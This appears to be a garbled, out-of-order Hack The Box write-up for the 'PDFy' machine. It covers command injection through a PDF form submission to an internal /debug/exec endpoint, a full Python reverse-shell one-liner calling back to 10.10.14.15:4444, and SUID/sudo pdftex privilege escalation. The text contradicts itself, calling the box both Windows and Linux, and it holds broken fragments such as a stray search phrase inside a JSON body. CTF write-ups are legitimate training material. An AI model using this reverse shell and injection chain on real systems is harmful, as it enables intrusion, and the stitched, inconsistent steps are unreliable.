After executing the pdftex exploit:
cat /root/root.txt
Example RPD format:
HTBr00t_pr00f_d4t4_456abc
The internal API has a /debug/exec endpoint (found via fuzzing).
Command injection via PDF:
Create a PDF with an HTTP POST request to http://127.0.0.1:5000/debug/exec with JSON body: pdfy htb writeup upd
"cmd": "id"
Embed this as a PDF form submission action.
Upload → server executes id and returns output embedded in PNG comment.
Get reverse shell:
"cmd": "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.15\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"]);'"
Listener catches shell as www-data.
PDFy is a medium-to-hard Windows machine focused on LFI/initial foothold via a web application that processes PDFs, followed by privilege escalation through misconfigured services and credential reuse. This writeup outlines an updated, concise path to user and root flags.
If you’ve been grinding through Hack The Box (HTB) machines, you’ve likely come across PDFy — a retired, medium-difficulty Linux box that focuses heavily on web application enumeration, PDF metadata exploitation, and abusing misconfigured binaries. The “PDFy HTB Writeup UPD” is a community-driven, updated walkthrough that aims to not only guide you through the root but also explain the why behind each step.
This review will break down the writeup’s structure, technical depth, accuracy, and overall value for beginners and intermediate hackers alike.
find / -perm -4000 2>/dev/null
Look for pdftex or tex. If pdftex is SUID root or you can run it as sudo, exploit it. After executing the pdftex exploit:
cat /root/root
Check sudo rights:
sudo -l
You might see:
(ALL) NOPASSWD: /usr/bin/pdftex
Enumerating the NetBIOS and Microsoft-DS ports using enum4linux reveals a list of users on the system.
$ enum4linux -u nobody -p 10.10.11.206
[+] Enumerated users
user:[pdfy] uid:[1677721600] gid:[1677721600] groups:[1677721600]
user:[phr] uid:[1677721601] gid:[1677721601] groups:[1677721601]